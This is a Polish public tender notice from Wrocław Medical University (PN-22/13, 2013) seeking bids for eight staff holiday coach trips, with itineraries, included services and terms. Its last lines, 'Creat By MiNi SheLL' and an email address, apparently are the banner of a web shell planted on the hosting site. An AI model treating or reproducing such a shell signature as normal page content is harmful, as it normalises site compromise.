<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty wybranego Wykonawcy, w zakresie:
a) ustawowej wysokości stawki podatku VAT:
Zmiana jest dopuszczalna, jeżeli w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki podatku VAT dla usług należących do przedmiotu zamówienia, wówczas strony dokonają odpowiedniej zmiany wynagrodzenia umownego. 
b) wejścia w życie innych, niż wymienione w lit. b, regulacji prawnych po dacie wejścia umowy w życie, wywołujących potrzebę jej zmiany;
c) zmiana danych dotyczących oznaczenia Zamawiającego i/lub Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umed.wroc.pl Link przetargi ZZP 2013 nr PN - 22 / 13<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.umed.wroc.pl Link przetargi ZZP 2013 nr PN - 22 / 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2013 godzina 09:00, miejsce: Zespół ds. Zamówień Publicznych Uniwersytetu Medycznego we Wrocławiu, 50-345 Wrocław, ul. Mikulicza - Radeckiego 5; pok. 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> UMW/AZ/PN-22/13 cz. A 
Przedmiotem zamówienia jest organizacja wycieczki Paryż -Wersal -Luwr -Disneyland
Montmarte, PlacPigalle, Moulin Rouge, Łuk Triumfalny, Katedra Notre Dame, Pantheon, Rejs statkiem po Sekwanie, Wieża Eiffela, Pola Elizejskie, Muzeum D Orsay, (Disneyland dla chętnych uczestników z dziećmi) dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 27 kwietnia - 3 maja 2013 r. (7 dni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> UMW/AZ/PN-22/13 cz. A 
Przedmiotem zamówienia jest organizacja wycieczki Paryż -Wersal -Luwr -Disneyland
Montmarte, PlacPigalle, Moulin Rouge, Łuk Triumfalny, Katedra Notre Dame, Pantheon, Rejs statkiem po Sekwanie, Wieża Eiffela, Pola Elizejskie, Muzeum D Orsay, (Disneyland dla chętnych uczestników z dziećmi) dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 27 kwietnia -  3 maja   2013 r. (7 dni)
a) W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem,
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 4 noclegi w hotelach min. ** lub pensjonatach o standardzie min. ***, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 osobowych, pozostałe-studio 2+2 lub 3 osobowe,
4. 4 śniadania wzmocnione,
5. 4 gorące obiadokolacje, 
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych,
9. ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> UMW/AZ/PN-22/13 cz.B
Przedmiotem zamówienia jest organizacja wycieczki Białowieża - Hajnówka - Supraśl - Augustów, - Puńsk -Wigry -Druskienniki, Białowieski  Park Narodowy, Rezerwat  żubrów, Rejs statkiem Augustów - Przewięź-Studzieniczna, Wigierski Park Narodowy, pobyt w Parku wodnym w Druskiennikach dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 1 maja - 4 maja 2013 r.  (4 dni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> UMW/AZ/PN-22/13 cz.B
Przedmiotem zamówienia jest organizacja wycieczki Białowieża - Hajnówka - Supraśl - Augustów, - Puńsk -Wigry -Druskienniki, Białowieski  Park Narodowy, Rezerwat  żubrów, Rejs statkiem Augustów - Przewięź-Studzieniczna, Wigierski Park Narodowy, pobyt w Parku wodnym w Druskiennikach dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 1 maja - 4 maja 2013 r.  (4 dni)  
a)  W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem, 
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 3 noclegi w hotelach min. ** lub pensjonatach o standardzie min. ***, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 osobowych, pozostałe - studio 2+2 lub 3 osobowe,
4. 3 śniadania /szwedzki stół, kawa i herbata/,
5. 3 gorące obiadokolacje, 
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych,
9. ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed  rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> UMW/AZ/PN-22/13 cz.C
Przedmiotem zamówienia jest organizacja wycieczki Kraków - Zakopane -Dolina Kościeliska - Gubałówka - Nidzica - Czorsztyn -  Basenytermalne   w  Białce Tatrzańskiej dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 29 maja - 1 czerwca 2013 r. (4 dni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> UMW/AZ/PN-22/13 cz.C
Przedmiotem zamówienia jest organizacja wycieczki Kraków - Zakopane -Dolina Kościeliska - Gubałówka - Nidzica - Czorsztyn -  Basenytermalne   w  Białce Tatrzańskiej dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 29 maja - 1 czerwca 2013 r. (4 dni)
a) W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem, 
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 3 noclegi w hotelach min. ** lub pensjonatach o standardzie min. ***, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 -osobowych, pozostałe - studio 2+2 lub 3 osobowe,
4. 3 śniadania /szwedzki stół, kawa i herbata/, 
5. 3 gorące obiadokolacje,
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe, 
8. koszty rezerwacji grupowych,
9. ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> UMW/AZ/PN-22/13 cz.D
Przedmiotem zamówienia jest organizacja wycieczki Hiszpania - Madryt - Toledo - Barcelona - Saragossa 2 dni wypoczynek na plażach Riwiery Hiszpańskiej (z noclegiem w trakcie przejazdu do Hiszpanii i w drodze powrotnej) dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 5 lipca - 13 lipca 2013 r. (9 dni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> UMW/AZ/PN-22/13 cz.D
Przedmiotem zamówienia jest organizacja wycieczki Hiszpania - Madryt - Toledo - Barcelona - Saragossa 2 dni wypoczynek na plażach Riwiery Hiszpańskiej (z noclegiem w trakcie przejazdu do Hiszpanii i w drodze powrotnej) dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 5 lipca - 13 lipca 2013 r. (9 dni)
a) W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem, 
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 8 noclegów w hotelach min. ** lub pensjonatach o standardzie min. ***, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 osobowych, pozostałe - studio 2+2 lub 3 osobowe,
4. 8 śniadań /szwedzki stół, kawa i herbata/, 
5. 8 gorących obiadokolacji,
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych, 
9. ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> UMW/AZ/PN-22/13 cz. E
Przedmiotem zamówienia jest organizacja wycieczki Kopenhaga - Sztokholm - Oslo - Lund - Malmo dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 12 sierpnia - 17 sierpnia 2013 r. (6 dni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> UMW/AZ/PN-22/13 cz.E
Przedmiotem zamówienia jest organizacja wycieczki Kopenhaga - Sztokholm - Oslo - Lund - Malmo dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 12 sierpnia - 17 sierpnia 2013 r. (6 dni)
a)W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem, 
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 3 noclegi w hotelach min. ** lub pensjonatach o standardzie min. ***, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 osobowych, pozostałe - studio 2+2 lub 3 osobowe, 1 nocleg na promie,
4. 4 śniadania /szwedzki stół, kawa i herbata/, w tym 1 na promie
5. 4 gorące obiadokolacje,
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych, 
9. ubezpieczenie NNW i KL.
Liczba uczestników - 46 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> UMW/AZ/PN-22/13 cz. F
Przedmiotem zamówienia jest organizacja wycieczki Grecja - Ateny - Kalambaki - Meteory - Peloponez - Korynt - Mykeny, Nafplio - Riwiera Olimpijska - Nei Pori 2 dni wypoczynek na plażach (z noclegiem w trakcie przejazdu do Grecji i w drodze powrotnej) dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 15 sierpnia - 23 sierpnia 2013 r. (9 dni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> UMW/AZ/PN-22/13 cz. F
Przedmiotem zamówienia jest organizacja wycieczki Grecja - Ateny - Kalambaki - Meteory - Peloponez - Korynt - Mykeny, Nafplio - Riwiera Olimpijska - Nei Pori 2 dni wypoczynek na plażach (z noclegiem w trakcie przejazdu do Grecji i w drodze powrotnej) dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 15 sierpnia - 23 sierpnia 2013 r. (9 dni)  
a) W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem, 
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 8 noclegów w hotelach min. ** lub pensjonatach o standardzie min. ***, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 osobowych, pozostałe - studio 2+2 lub 3 osobowe,
4. 8 śniadań /szwedzki stół, kawa i herbata/,
5. 8 gorących obiadokolacji,
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych, 
9. ubezpieczenie NNW i KL.
Liczba uczestników - 42 osoby (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> UMW/AZ/PN-22/13 cz. G
Przedmiotem zamówienia jest organizacja wycieczki Chorwacja - Zadar -Plitvickie Jeziora - Šibenik - Park Narodowy KRKA - Trogir - Split- Dubrovnik (2 dni plażowanie lub fakultatywnie we własnym zakresie rejsy na wyspy); noclegi środkowa Dalmacja dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 31 sierpnia - 8 września 2013 r. (9 dni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> UMW/AZ/PN-22/13 cz. G
Przedmiotem zamówienia jest organizacja wycieczki Chorwacja - Zadar -Plitvickie Jeziora - Šibenik - Park Narodowy KRKA - Trogir - Split- Dubrovnik (2 dni plażowanie lub fakultatywnie we własnym zakresie rejsy na wyspy); noclegi środkowa Dalmacja dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 31 sierpnia - 8 września 2013 r. (9 dni)
a) W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem,
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 6 noclegów w hotelach min. ** lub pensjonatach o standardzie min. ***, w pokojach z pełnym węzłem sanitarnym minimum 70% pok.2 osobowych, pozostałe-studio 2+2 lub 3 osobowe,
4. 6 śniadań /szwedzki stół, kawa i herbata/,
5. 6 gorących obiadokolacji, 
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych,
9. ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> UMW/AZ/PN-22/13 cz. H
Przedmiotem zamówienia jest organizacja wycieczki Wiedeń - Ołomuniec - Brno
Schőnbrunn, Hofburg, Kahlenberg, Graben- Kolumna Morowa, Opera Wiedeńska, Krypta cesarska Habsburgów, Katedra Św. Stefana dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 5 września - 7 września 2013 r. (3 dni). Noclegi  w Wiedniu lub  okolicy do 15 km.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> UMW/AZ/PN-22/13 cz. H
Przedmiotem zamówienia jest organizacja wycieczki Wiedeń - Ołomuniec - Brno
Schőnbrunn, Hofburg, Kahlenberg, Graben- Kolumna Morowa, Opera Wiedeńska, Krypta cesarska Habsburgów, Katedra Św. Stefana dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 5 września - 7 września 2013 r. (3 dni). Noclegi  w Wiedniu lub  okolicy do 15 km
W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem,
2.  Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 2 noclegi w hotelach min. ** lub pensjonatach o standardzie min. ***, w pokojach z pełnym węzłem sanitarnym minimum 70% pok.2 osobowych, pozostałe-studio 2+2 lub 3 osobowe,
4. 2 śniadania /szwedzki stół, kawa i herbata/,
5. 2 gorące obiadokolacje, 
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych,
9.ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c)  Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d)  Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com